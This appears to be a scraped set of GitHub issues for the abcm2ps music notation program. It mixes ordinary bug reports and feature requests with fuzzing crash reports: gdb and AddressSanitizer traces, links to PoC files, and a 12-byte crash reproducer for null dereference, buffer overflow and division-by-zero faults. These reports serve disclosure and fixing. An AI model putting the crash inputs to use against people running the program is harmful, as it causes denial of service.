==17600== by 0x434924: do_tune (parse.c:3608)
==17600== by 0x4088A1: abc_parse (abcparse.c:177)
==17600== by 0x41F686: txt_add_eos (front.c:379)
==17600== by 0x4200E7: frontend (front.c:891)
==17600== by 0x403FAC: treat_file (abcm2ps.c:239)
==17600== by 0x4030E7: main (abcm2ps.c:1040)
==17600==
==17600== HEAP SUMMARY:
==17600== in use at exit: 636,821 bytes in 115 blocks
==17600== total heap usage: 146 allocs, 31 frees, 1,768,065 bytes allocated
==17600==
==17600== LEAK SUMMARY:
==17600== definitely lost: 30 bytes in 3 blocks
==17600== indirectly lost: 0 bytes in 0 blocks
==17600== possibly lost: 0 bytes in 0 blocks
==17600== still reachable: 636,791 bytes in 112 blocks
==17600== suppressed: 0 bytes in 0 blocks
==17600== Rerun with --leak-check=full to see details of leaked memory
==17600==
==17600== For counts of detected and suppressed errors, rerun with: -v
==17600== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)
It is a division-by-zero vulnerability
<do_tune+2256> idiv r11d
$r11 : 0x0000000000000000
https://drive.google.com/open?id=1LBcdyedXMoub4bhGGHFMxYqU7NeoAuwf
Version: 8.13.20 after commit fd956e1
(gdb) set args POC6
(gdb) r
abcm2ps-8.13.20 (2018-02-21)
File POC6
POC6:3:2: error: Bad character
3 |2ÿÿdÿ&e,d_d&ddªB-ÿ2ÿ
^
POC6:3:3: error: Bad character
3 |2ÿÿdÿ&e,d_d&ddªB-ÿ2ÿ
^
.
.
.
POC6:27:14: error: !slide! must be on a note or a rest
POC6:27:38: error: Bad character 't'
POC6:27:38: error: Bad character 'N'
POC6:27:38: error: Bad character 'N'
POC6:31:0: error: tune info ':' not treated
POC6:26:25: warning: Line underfull (561pt of 682pt)
POC6:4:0: error: Note too much dotted
POC6:3:20: error: Bad tie
POC6:22:0: error: Bad tie
Program received signal SIGSEGV, Segmentation fault.
gchord_width (s=s@entry=0x845f88, wlnote=wlnote@entry=8, wlw=wlw@entry=8) at music.c:862
862 if (s2->sflags & S_SEQST)
(gdb) bt
#0 0x00000000004f4fb0 in gchord_width (s=s@entry=0x845f88, wlnote=wlnote@entry=8, wlw=wlw@entry=8)
at music.c:862
#1 0x000000000050eedb in set_allsymwidth (s=0x845f88) at music.c:1194
#2 0x000000000050eedb in set_allsymwidth (last_s=last_s@entry=0x830db0) at music.c:1436
#3 0x000000000052defa in output_music () at music.c:3371
#4 0x000000000052defa in output_music () at music.c:4766
#5 0x000000000052defa in output_music () at music.c:5134
#6 0x000000000054d511 in generate () at parse.c:1039
#7 0x00000000005709cd in do_tune (eob=0) at parse.c:1060
#8 0x00000000005709cd in do_tune () at parse.c:3620
#9 0x0000000000414731 in abc_eof () at abcparse.c:200
#10 0x00000000004e45e9 in frontend (s=,
s@entry=0x827a40 "X:^2\rK:\r|2\377\377d\377&e,d_d&dd\252B-\377\062\377\n[e,c>|2\377\377&e9k>|2\377\n[\020'eD[\377\205\377fe-d6e{@)\177\377\r:\001&d\353\377\177ddzd{\370\062Kdd\231d2\rtdd&E,\351\177"&ed\252d-\r\177&KL\031K:\352\325J:Ӫd-\r\177&K_\031K:\352\325J:\323\323\375L\213-c>|2!\v[\377[\020'eD[\377\205\377fe-d6e{@)\177\377\r:\001&d\353\377\177ddzd{UUUUUt&K:1J:\323\326\360L\203-", <incomplete sequence \375>..., ftype=ftype@entry=0, fname=fname@entry=0x825ea0 "POC6", linenum=31, linenum@entry=0) at front.c:901
#11 0x000000000040b98d in treat_file (fn=, ext=) at abcm2ps.c:239
#12 0x00000000004084f9 in main (argc=0, argv=) at abcm2ps.c:1040
(gdb) list
857 for (s2 = s->ts_prev; ; s2 = s2->ts_prev) {
858 if (s2 == s->prev) {
859 AT_LEAST(wlw, lspc);
860 break;
861 }
862 if (s2->sflags & S_SEQST)
863 lspc -= s2->shrink;
864 }
865 }
866 if (alspc != 0)
The command line argument processing doesn't detect the -p switch. For example:
[sbeitzel@PirateBook ~/src/github/abcm2ps]$ ./abcm2ps -p sample.abc
abcm2ps-8.13.16 (2017-10-24)
error: Unknown flag: -p ignored
File sample.abc
I'm attaching a patch which fixes this:
pipeformat_patch.txt
The ABC standard suggests that one ought to be able to redefine a symbol to include an annotation. However, abcm2ps seems to treat any such definition as needing to be a decoration string. For example, the following ABC file:
%abc-2.1 %%straightflags false %%flatbeams true %%graceslurs false %%titleformat T0, R-1 C1 X: 1 T: Moonstar (SNARE) C: arr. by Gloria Pellegrin M: 4/4 L: 1/8 K: none stafflines=1 V: S stem=down gstem=up dyn=up clef=none snm="S" U: R = /// U: r = // U: v = "^V" V:S {A}c>A r(cA) {A}cvrc
produces this error output:
abcm2ps-8.13.17 (2017-11-21) File moonstar_snare.abc moonstar_snare.abc:17:19: error: Decoration !"^V"! not defined
Whereas, if the line is changed to:
{A}c>A r(cA) {A}c"^V"rc
then the output looks the way one expects, with a 'V' appearing above the last note.
StdErr is used to dispatch messages that are no errors at all, such as "file "XXX.svg generated".
Thank you,
Claudius
How to build windows?
https://drive.google.com/open?id=1Y2IbtEr9v4l4Ruie_AY9BFJOHOGiDt7S
(gdb) set args POC4
(gdb) r
abcm2ps-8.13.20 (2018-02-21)
File POC4
Line 14: Empty line in tune header - K:C added
Program received signal SIGSEGV, Segmentation fault.
__memcpy_avx_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S:273
273 ../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S: No such file or directory.
(gdb) bt
#0 0x00007ffff69d51e3 in __memcpy_avx_unaligned ()
at ../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S:273
#1 0x00000000004e1b5b in txt_add (__len=18446744073709551615, __src=0x827f3e, __dest=)
at /usr/include/x86_64-linux-gnu/bits/string3.h:53
#2 0x00000000004e1b5b in txt_add (s=0x827f3e "", sz=-1) at front.c:117
#3 0x00000000004e558a in frontend (s=,
s@entry=0x827ea0 "X:Eƒ\nB\222\nWV\thf\nf\nI:tOB\222\nW:T@\nW:\nW:9 hf\nf\nI: OB\222\nW:\t@EBhf\nf\nI: OB\222\n\nW OB\222\nW:\\nB\222\nWV\thf\nf\nI:tOB\222\nW:Tt\nW:\nW:9\211hf\nf\nI: OB\222\nW:\tOEBx\nW:TthB\222\035W:x\nW:\nW:9thf\nf\nI: ", ftype=ftype@entry=0, fname=fname@entry=0x827f60 "POC4", linenum=31, linenum@entry=0) at front.c:882
#4 0x000000000040b98d in treat_file (fn=, ext=) at abcm2ps.c:239
#5 0x00000000004084f9 in main (argc=0, argv=) at abcm2ps.c:1040
If a tune is noted as being in the "key" of bagpipe (K:HP) then grace notes will be drawn as small 32nd notes. However, if the tune is noted as being in the key of D (K:D), which is how bagpipes are tuned, then grace notes are drawn as small 1/8th notes. Some modern composers, notably Fred Morrison and Gordon Duncan, have made wide use of C-natural and so there are many tunes that are written for bagpipes and which are really not in the key of D but in G. It'd be nice to be able to provide a formatting directive at the top of the tune to specify the drawn time value of a grace note, similar to the "L:" field.
%%gracenotelength 1/32 for example, while the default (for tunes not in the key of HP) would be %%gracenotelength 1/8.
I understand that this would represent an extension to the existing ABC music standard and would have to go through discussion and voting, etc. But in the interim, what about an application specific directive? %%abcm2ps:gracenotelength 1/32
There seems to have been a problem for a while now with opening repeat bar lines not going through to multiple voices when at the start of a new line. It only seems to apply to the second one in a file
Example
X:9
T:Indian Queen, The
Q:1/2=110
S:Playford
%%scale=0.75
M:2/2
L:1/4
K:D
V:1
"^A" |: f/g/ | "D"af df | "A"e2 A2 | "D"FA Af | "A"e2 - ef/g/ |
D"af df | "A"e2 A2 | "D"FA Af | "D"d3 :|
"^B" |: c/d/ | "A"e/d/c/B/ Ae | "F#m"fc "Bm"dB | "D"f/g/a "E"b^g | "A"a3e/f/ |
"G"g/f/e/d/ "A"ca | "G"Bg "D"Af/g/ | "G"ed "A"ec | "D"d3 :|
V:2
|: f/g/ | aafa- | agec | Adfa | g2 g>a | aafa- | agec | Ad "A"fa/g/ | f3 :|
|: e/f/ | g/f/e/d/ cg | a2 fd | d/e/f ^ge | aceg/a/ | b/a/g/f/ ea | g2 fa | bg- ga/g/ | f3 :|
this abc parse is error, 8va show repeat by measure number 17 start:
X:1
Z:?
%%scale 0.85
%%pagewidth 20.99cm
%%leftmargin 1.90cm
%%rightmargin 1.27cm
%%score { ( 1 2 ) | ( 3 4 ) }
L:1/4
Q:1/2=72
M:4/4
I:linebreak $
K:C
V:1 treble nm="Piano" snm="Pno."
L:1/16
V:2 treble
V:3 bass
L:1/16
V:4 bass
V:1
"_sempre leggiero""^Molto allegro""_9." !1!CDEF GFED CDEF GFED | CDEF GFED CDEF GA!3!B!1!c | %2
!1!DEFG !5!AGFE DE!3!F!1!G ABcd |$ !3!BABc dcBA GA!3!B!1!c defg | %4
[Q:1/4=40]"_cresc." !3!edef gfed cdef gfed | cdef gfed cdef gabc' |$ !1!defg agfe defg abc'd' | %7
babc' d'c'ba gabc' d'e'f'g' |!f! [c'e']2 z2 z4 z8 |$ [!1!!3!c'e']2 z2 z4 z4 [c'e']2 z2 | %10
[c'^f']2 z2 z4 z4 [!2!!3!^fa]2 z2 | [^fd']2 z2 z4 z4 [fc']2 z2 |$ %12
[Q:1/4=40]"_dimin." [gb]2 z2 z4 !3!bgab !1!c'd'e'^f' | %13
!p!!8va(! !1!g'a'b'c'' d''c''b'a' g'!4!^f'e'd' c'!3!bag!8va)! | %14
!2!^f!1!gab !4!c'bag !4!fedc !3!BAG!3!^F |$ %15
[Q:1/4=40]"_cresc." !5!A!1!DE^F !1!GAB!1!c de^f!1!g abc'!5!d' | %16
!3!bgab !1!c'd'e'^f'!8va(! !5!g'!1!d'e'^f' !4!g'd'e'f' | %17
!1!g'a'b'c'' d''c''b'a' g'!4!^f'e'd' c'!3!bag!8va)! |$ !2!^f!1!gab c'bag !4!fedc !3!BAG!3!^F | %19
!f! !5!ADE^F !1!GAB!1!c de^f!1!g abc'!5!d' | !3!b2 z2 z4 z !1!Bc!3!d !1!e^fga |$ %21
!p! b2 z2 z4 !5!bag^f !1!e!3!dcB |!f! !2!c2 z2 z4 z !1!cde !4!^f!1!gab | %23
!4!c'2 z2 z4 !4!c'bag !4!^fedc |$!f! d2 z2 z4 z !1!de!3!^f !1!gabc' | %25
!p![Q:1/4=40]"_cresc." !5!d'2 z2 z4 !5!d'c'ba g!3!^fed | %26
!2!e!3!^f!1!ga!8va(! !3!b!1!c'd'e' !4!^f'e'd'!1!c' !3!bag!2!^f |$ %27
!1!gab!4!c' !1!d'e'^f'!4!g' !5!a'g'f'e' !1!d'!4!c'ba | %28
!1!bb'a'g' ^f'e'!3!d'^c' !1!d'b'a'g' f'e'!3!d'c' | %29
!1!d'b'a'g' ^f'e'!3!d'!2!^c' !5!e'd'=c'b abc'd' |$ %30
!p! !1!bb'a'g' ^f'e'!3!d'!2!^c' !1!d'b'a'g' f'e'd'c' | %31
d'b'a'g' ^f'e'd'!2!^c' !5!e'd'=c'b abc'd'!8va)! | %32
!pp! !2!b!4!d'c'b !1!a!4!c'ba !1!g!4!bag !1!=f!4!agf |$ %33
!1!e!4!gfe !1!d!4!fed !1!c!4!edc !1!B!4!dcB | %34
[Q:1/4=40]"_cresc." !1!A!3!cBA !2!^G!4!BAG !1!A!3!cBA !2!G!4!BAG | %35
!1!AB!3!c!1!d e^f^g!5!a !4!=g!2!efg agfe |$!f! de^f!1!g abc'!5!d' !1!gab!1!c'!8va(! d'e'^f'!5!g' | %37
!1!d'e'^f'!1!g' a'b'c''d''!8va)! z4 [Acd^f]4 | [Bdg]4 z4 z8 |$ %39
[Q:1/4=40]"_dolce" z4 .[!1!!3!GB]4 .[GB]4 .[GB]4 | (!1!!5!d8 !4!c8) | %41
z4 .[!2!!4!c^f]4 .[cf]4 .[cf]4 |$[Q:1/4=40]"_cresc." (g8 d8) | z4 .[!1!!3!gb]4 .[gb]4 .[gb]4 | %44
(d'8 c'8) |$!8va(! z4 .[!2!!4!c'^f']4 .[c'f']4 .[c'f']4 | %46
!f! .[bg']2 z2 z4 !1!d'e'!3!^f'!1!g' a'b'c''d'' | .!3!b'2 z2 .!2!g'2 z2 d'e'^f'g' a'b'c''d'' |$ %48
.!3!b'2 z2.!1!g'2 z2!p! !2!=f'!3!g'!4!a'!1!b' c''d''e''f'' | %49
e''d''c''!1!b' !4!a'g'f'!1!e' !2!d'!3!e'!4!f'!1!g' a'b'c''d'' | %50
c''b'a'g' !4!f'e'd'!1!c' !2!b!3!c'!4!d'!1!e' f'g'a'b' |$ %51
[Q:1/4=40]"_cresc." a'g'f'e' !4!d'c'ba !2!g!3!a!4!b!1!c' d'e'f'g' | %52
f'e'd'c' !4!bagf !2!e!3!f!4!g!1!a bc'd'e' | d'c'ba !4!gfe!1!d !2!c!3!d!4!e!1!f gabc' |$ %54
!ff! !1!b!5!g'f'e' d'c'!3!b!8va)!a g!4!fed c!3!BAG | !4!FEDC !3!B,A,G,A, B,!1!CDE !1!FGAB | %56
c2 z2 z4 z4 [!1!!2!EG]2 z2 |$ [Ec]2 z2 (c8 _B4 | %58
[Q:1/4=40]"_cresc." [FA]2) z2 z4 z4 [!1!!2!Ac]2 z2 | [Af]2 z2 (!4!f8 a4 |$ %60
[!1!!2!G=B]2) z2 z4 z4 [!1!!3!Bd]2 z2 | [Bg]2 z2 (g8 f4 |$ %62
!f! !1!e)fg!1!a bc'd'e' d'e'd'c' ba!3!gf | efg!1!a bc'd'e' d'e'd'c' ba!3!gf |$ %64
e2 z2 [!2!!5!dg]2 z2 !1!c2 z2 [!2!!5!Be]2 z2 | !1!A2 z2 [!2!!5!Gc]2 z2 !1!F2 z2 [!2!!5!EA]2 z2 |$ %66
!3!F!1!DEF !1!GAB!4!^c !1!defg !5!a!2!e!3!f!1!d | %67
!5!g!2!^d!3!e!1!=c gdec !5!f!2!^c!3!=d!1!B fcdB |$ %68
[Q:1/4=40]"_dimin." =c2 z2 z4 z4 [!3!!5!EG]2 z2 | [CE]2 z2 z4 z4 [EG]2 z2 | %70
!p! [CE]2 z2 z4!ff! [cegc']2 z2 z4 |] %71
V:2
x4 | x4 | x4 |$ x4 | x4 | x4 |$ x4 | x4 | x4 |$ x4 | x4 | x4 |$ x4 |!8va(! x4!8va)! | x4 |$ x4 | %16
x2!8va(! x2 | x4!8va)! |$ x4 | x4 | x4 |$ x4 | x4 | x4 |$ x4 | x4 | x!8va(! x3 |$ x4 | x4 | x4 |$ %30
x4 | x4!8va)! | x4 |$ x4 | x4 | x4 |$ x3!8va(! x | x2!8va)! x2 | x4 |$ x4 | ^F4 | x4 |$ B4 | x4 | %44
^f4 |$!8va(! x4 | x4 | x4 |$ x4 | x4 | x4 |$ x4 | x4 | x4 |$ x7/4!8va)! x9/4 | x4 | x4 |$ x E3 | %58
x4 | x A3 |$ x4 | x B3 |$ x4 | x4 |$ x4 | x4 |$ x4 | x4 |$ x4 | x4 | x4 |] %71
V:3
!p! z16 | [!4!E,G,]2 z2 z4 z4 [E,G,]2 z2 | [F,A,]2 z2 z4 z4 [!4!F,A,]2 z2 |$ %3
[G,B,]2 z2 z4 z4 [!4!B,D]2 z2 | [CE]2 z2 z4 z8 |[K:treble] [!4!EG]2 z2 z4 z4 [EG]2 z2 |$ %6
[FA]2 z2 z4 z4 [!4!FA]2 z2 | [GB]2 z2 z4 z4 [GB]2 z2 | !5!CDEF GFED CDEF GFED |$ %9
CDEF GFED CDEF !1!G!3!ABc | !5!DE^FG AGFE DEFG AGFE | DE^FG AGFE DEFG !1!A!3!Bcd |$ %12
!5!GABc dcBA G2 z2 z4 | [B,DG]2 z2 z4 z4 [B,DG]2 z2 | %14
[!4!A,CD^F]2 z2 z4 z4[K:bass] [!4!A,CD]2 z2 |$ [!5!!2!^F,C]2 z2 z4 z4 [F,A,D]2 z2 | %16
[G,B,D]2 z2 z4 z8 | [B,,D,G,]4 z4 z4 [B,,D,G,]4 |$ [A,,C,D,^F,]4 z4 z4 [A,,C,D,F,]4 | %19
[^F,,A,,C,D,]4 z4 z4 [F,,A,,C,D,]4 | !5!G,,A,,B,,C, D,!3!E,^F,G, G,,2 z2 z4 |$ %21
!5!G,A,B,C D!3!E^FG G,2 z2 z4 | !5!A,,B,,C,D, E,!3!^F,G,A, A,,2 z2 z4 | %23
[K:treble]!p! !5!A,B,CD E!3!^FGA A,2 z2 z4 |$[K:bass] !4!B,,C,D,!1!E, !4!^F,G,A,!1!B, B,,2 z2 z4 | %25
[K:treble] !4!B,CD!1!E !4!^FGA!1!B B,2 z2 z4 | [!4!CG]8 [CDA]8 |$ [B,DG]8 [A,CD^F]8 | %28
!f! [G,B,DG]2 z2 z2 (!2!^A2 .[!1!!4!GB]2) z2 z2 (A2 | .[GB]2) z2 z4 [D^Fc]8 |$ %30
[K:bass] !2!G,4 D,4 G,4 D,4 | G,4 D,4 ^F,4 D,4 | %32
[G,B,]2 z2[K:treble] !3!^d2 z2 !2!e2 z2 !3!B2 z2 |$ !2!c2 z2 !3!^G2 z2 !2!A2 z2 [!1!!4!DG]2 z2 | %34
[!5!!3!CE]2 z2 [D=F]2 z2 [CE]2 z2 [DF]2 z2 | [CE]8 [^CE=GA]8 |$ %36
[DGB]2 z2[K:bass] [D,D]2 z2 [B,,B,]2 z2 [G,,G,]2 z2 | [D,,D,]2 z2 z4!ff! [D,^F,A,C]8 | %38
!5!G,,A,,B,,C, D,C,B,,A,, G,,A,,B,,C, D,C,B,,A,, |$ %39
G,,A,,B,,C, D,C,B,,A,, G,,A,,B,,C, D,!3!E,^F,G, | !5!D,E,^F,G, A,G,F,E, D,E,F,G, A,G,F,E, | %41
D,E,^F,G, A,G,F,E, D,E,F,G, A,!3!B,CD |$ G,A,B,C DCB,A, G,A,B,C DCB,A, | %43
G,A,B,C DCB,A, G,A,B,C[K:treble] DE^FG | DE^FG AGFE DEFG AGFE |$ DE^FG AGFE DEFG ABcd | %46
GABc d!3!e^fg .f2 z2 .d2 z2 | GABc de^fg .f2 z2 .d2 z2 |$ GABc d!3!e^fg !3!a4 !1!c'4 | %49
!4!g4 !1!b4 !4!=f4 !1!a4 | !4!e4 !1!g4 !4!d4 !1!f4 |$ c4 e4 B4 d4 | A4 c4 G4 B4 | %53
F4 A4 !3!E4 G4 |$ [G,B,DF]16 | z16!>(!!>)! |[K:bass]!p! C,D,E,F, G,F,E,D, C,D,E,F, G,F,E,D, |$ %57
C,D,E,F, G,F,E,D, C,D,E,F, G,!3!A,_B,C | !5!F,G,A,_B, CB,A,G, F,G,A,B, CB,A,G, | %59
F,G,A,_B, CB,A,G, F,G,A,B, C!3!DEF |$ !5!G,A,=B,C DCB,A, G,A,B,C DCB,A, | %61
G,A,B,C DCB,A, G,A,B,C[K:treble] D!3!EFG |$ !5!CDEF G!3!ABc [!2!!4!GB]2 z2 [!1!!5!B,G]2 z2 | %63
CDEF GABc [GB]2 z2 [B,G]2 z2 |$[K:bass] !4!C!1!EDC !4!B,!1!DCB, !4!A,!1!CB,A, !4!G,!1!B,A,G, | %65
!4!F,!1!A,G,F, !4!E,!1!G,F,E, !4!D,!1!F,E,D, !4!^C,!1!E,!2!D,C, |$ D,2 z2 z4 [F,,A,,D,]2 z2 z4 | %67
[G,,=C,E,]2 z2 z4 [G,,D,F,]2 z2 z4 |$ C,D,E,F, G,F,E,D, C,D,E,F, G,F,E,D, | %69
C,D,E,F, G,F,E,D, C,D,E,F, G,F,E,D, | C,2 z2 z4 [C,,E,,G,,C,]2 z2 z4 |] %71
V:4
x4 | x4 | x4 |$ x4 | x4 |[K:treble] x4 |$ x4 | x4 | x4 |$ x4 | x4 | x4 |$ x4 | x4 | %14
x3[K:bass] x |$ x4 | x4 | x4 |$ x4 | x4 | x4 |$ x4 | x4 |[K:treble] x4 |$[K:bass] x4 | %25
[K:treble] x4 | x4 |$ x4 | x4 | x4 |$[K:bass] [G,B,]2 [G,B,]2 | [G,B,]2 [^F,C]2 | x[K:treble] x3 |$ %33
x4 | x4 | x4 |$ x[K:bass] x3 | x4 | x4 |$ x4 | x4 | x4 |$ x4 | x3[K:treble] x | x4 |$ x4 | x4 | %47
x4 |$ x2 a2 | g2 f2 | e2 d2 |$ c2 B2 | A2 G2 | F2 E2 |$ x4 | x4 |[K:bass] x4 |$ x4 | x4 | x4 |$ %60
x4 | x3[K:treble] x |$ x4 | x4 |$[K:bass] x4 | x4 |$ x4 | x4 |$ x4 | x4 | x4 |] %71
What is the vulnerability?
Null Pointer Dereference vulnerability is discovered in the abcm2ps (8.14.1-master). The same can be triggered by sending a crafted abc file to the abcm2ps binary. It allows an attacker to cause Denial of Service (Segmentation fault) or possibly have unspecified other impact when a victim opens a specially crafted file.
Tested environment : 64-bit ubuntu 16.04 LTS
Affected version : 8.14.1-master
Command -
./abcm2ps r -E -g -x -v -O fff -O = -i -k 1 $POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10
Synopsis :
while doing research when get_note() function is called it is having convert decorations function deco_cnv() which calls function deco_intern() to convert the external deco number to the internal one.
By passing crafted .abc file for conversion while reading the symbols from deco to write into the converting file. In deco_define(name=0x0) arg name is 0 accessed from defined symbols and passed to the strlen(name) which leads to __strlen_avx2() for SIGSEGV.
Vulnerable code :
l = strlen(name);
for (d = user_deco; d; d = d->next) {
if (strncmp(d->text, name, l) == 0
&& d->text[l] == ' ')
return deco_build(name, d->text);
}
Debug:
GDB :
In function deco_define()
989 l = strlen(name);
990 for (d = user_deco; d; d = d->next) {
991 if (strncmp(d->text, name, l) == 0
992 && d->text[l] == ' ')
993 return deco_build(name, d->text);
994 }
────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Id 1, Name: "abcm2ps", stopped, reason: BREAKPOINT
────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x555555566a8b → deco_define(name=0x0)
0x555555567ed8 → deco_intern(s=0x555555875a00, ideco=<optimized out>)
0x555555567ed8 → deco_cnv(dc=0x555555875c08, s=0x555555875a00, prev=0x0)
0x55555559024c → get_note(s=<optimized out>)
0x55555559024c → do_tune()
0x555555561a52 → abc_parse(p=0x5555557f4a20 "", fname=0x5555557f39f0 "POC", ln=0x64)
0x555555579a54 → txt_add_eos(fname=0x5555557f39f0 "$POC", linenum=0x64)
0x555555579ee4 → frontend(s=<optimized out>, ftype=<optimized out>, fname=<optimized out>, linenum=<optimized out>)
0x55555555ce2d → treat_file(fn=0x7fffffffe26a "$POC", ext=<optimized out>)
0x55555555b9e1 → main(argc=0x17, argv=0x7fffffffde38)
────────────────────────────────────────────────────────────────────────────────────────────────────────────────
deco_define (name=name@entry=0x0) at deco.c:989
989 l = strlen(name);
gef➤ p name
$101 = 0x0
gef➤ bt
#0 0x00007ffff69465a1 in __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:62
#1 0x0000555555566a90 in deco_define (name=name@entry=0x0) at deco.c:989
#2 0x0000555555567ed8 in deco_intern (s=0x555555875a00, ideco=<optimized out>) at deco.c:1022
#3 0x0000555555567ed8 in deco_cnv (dc=dc@entry=0x555555875c08, s=s@entry=0x555555875a00, prev=prev@entry=0x0) at deco.c:1049
#4 0x000055555559024c in get_note (s=<optimized out>) at parse.c:4377
#5 0x000055555559024c in do_tune () at parse.c:3510
gef➤ i r
rax 0x5555557c49a0 0x5555557c49a0
rbx 0x1 0x1
rcx 0x0 0x0
rdx 0x0 0x0
rsi 0x555555875a00 0x555555875a00
rdi 0x0 0x0
rbp 0x1 0x1
rsp 0x7fffffffd858 0x7fffffffd858
r8 0x56 0x56
r9 0x555555875550 0x555555875550
r10 0x55555588c408 0x55555588c408
r11 0x5555555a3b88 0x5555555a3b88
r12 0x555555875c08 0x555555875c08
r13 0x0 0x0
r14 0x0 0x0
r15 0x5555557be7d0 0x5555557be7d0
rip 0x7ffff69465a1 0x7ffff69465a1 <__strlen_avx2+17>
eflags 0x10283 [ CF SF IF RF ]
cs 0x33 0x33
ss 0x2b 0x2b
ds 0x0 0x0
es 0x0 0x0
fs 0x0 0x0
gs 0x0 0x0
Valgrind :
Access not within mapped region at address 0x0
at 0x4C32CF2: strlen (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
by 0x11AA8F: deco_define (deco.c:989)
by 0x11BED7: deco_intern (deco.c:1022)
by 0x11BED7: deco_cnv (deco.c:1049)
by 0x14424B: get_note (parse.c:4377)
by 0x14424B: do_tune (parse.c:3510)
Segmentation fault
Reproducer file - Reproducer
Reproducer: abcm2ps-global-buffer-overflow-subs.c-cwid.abc.zip (SHA1: 0bb5bd5f8816137483183149f2e319bfb1af83f6)
Tested in: 070cfe6
Fuzzing tool used: afl-2.52b
00000000 58 3a 0a 4b 3a 0a 47 0a 77 3a 30 80 |X:.K:.G.w:0.|
0000000c
~/src/abcm2ps/abcm2ps abcm2ps-global-buffer-overflow-subs.c-cwid.abc
abcm2ps-8.13.20 (2018-02-21)
File abcm2ps-global-buffer-overflow-subs.c-cwid.abc
=================================================================
==28346==ERROR: AddressSanitizer: global-buffer-overflow on address 0x55f8791225a0 at pc 0x55f8790b80b7 bp 0x7ffdd1e58870 sp 0x7ffdd1e58868
READ of size 2 at 0x55f8791225a0 thread T0
#0 0x55f8790b80b6 in cwid /home/hsalo/src/abcm2ps/subs.c:130
#1 0x55f87901a155 in ly_width /home/hsalo/src/abcm2ps/music.c:941
#2 0x55f8790286ec in set_width /home/hsalo/src/abcm2ps/music.c:1126
#3 0x55f8790286ec in set_allsymwidth /home/hsalo/src/abcm2ps/music.c:1436
#4 0x55f879048023 in output_music /home/hsalo/src/abcm2ps/music.c:5120
#5 0x55f87907cd20 in generate /home/hsalo/src/abcm2ps/parse.c:1039
#6 0x55f8790a437c in gen_ly /home/hsalo/src/abcm2ps/parse.c:1060
#7 0x55f8790a437c in do_tune /home/hsalo/src/abcm2ps/parse.c:3621
#8 0x55f878f229b0 in abc_eof /home/hsalo/src/abcm2ps/abcparse.c:200
#9 0x55f878ffcdf8 in frontend /home/hsalo/src/abcm2ps/front.c:905
#10 0x55f878f1af3e in treat_file /home/hsalo/src/abcm2ps/abcm2ps.c:239
#11 0x55f878f172b6 in main /home/hsalo/src/abcm2ps/abcm2ps.c:1040
#12 0x7fd17cd832e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)
#13 0x55f878f19649 in _start (/home/hsalo/src/abcm2ps/abcm2ps+0x37649)
0x55f8791225a0 is located 0 bytes to the right of global variable 'cw_tb' defined in 'subs.c:42:14' (0x55f8791224a0) of size 256
SUMMARY: AddressSanitizer: global-buffer-overflow /home/hsalo/src/abcm2ps/subs.c:130 in cwid
Shadow bytes around the buggy address:
0x0abf8f21c460: f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
0x0abf8f21c470: f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
0x0abf8f21c480: f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9 06 f9 f9 f9
0x0abf8f21c490: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0abf8f21c4a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0abf8f21c4b0: 00 00 00 00[f9]f9 f9 f9 00 00 00 00 00 00 00 00
0x0abf8f21c4c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0abf8f21c4d0: 05 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9
0x0abf8f21c4e0: 07 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9
0x0abf8f21c4f0: 06 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
0x0abf8f21c500: 04 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==28346==ABORTING
Sample minimized using afl-tmin:
File size reduced by : 93.88% (to 12 bytes)
Characters simplified : 1333.33%
Number of execs done : 134
Fruitless execs : path=70 crash=0 hang=0
I get "Notation 'X' not treated"
when I try to use X as (multi-) measure invisible rest accoring to http://abcnotation.com/wiki/abc:standard:v2.2#rests
X:1
T:1.right hand
C:tom
%%scale 0.85
%%pagewidth 21.59cm
%%leftmargin 2.54cm
%%rightmargin 1.26cm
%%score { 1 | 2 }
L:1/4
Q:1/4=120
M:4/4
I:linebreak $
K:C
V:1 treble
V:2 bass
V:1
!1!C4 | C4 | C4 | C4 |] %4
V:2
z4 | z4 | z4 | z4 |] %4
https://drive.google.com/open?id=1oDJS29GBoRR8Wl2X9MMRycW0DMVieOYc
(gdb) set args POC5
(gdb) r
abcm2ps-8.13.20 (2018-02-21)
File POC5
POC5:7:3: error: Bad character
7 :ReÜa:K:eæ]E
^
.
.
.
Program received signal SIGSEGV, Segmentation fault.
0x00000000004bc344 in draw_bar (h=24, bot=-51, s=0x847fd8) at draw.c:1205
1205 for (s2 = s->prev; s2->abc_type != ABC_T_REST; s2 = s2->prev)
(gdb) bt
#0 0x00000000004bc344 in draw_systems (h=24, bot=-51, s=0x847fd8) at draw.c:1205
#1 0x00000000004bc344 in draw_systems (indent=indent@entry=0) at draw.c:4570
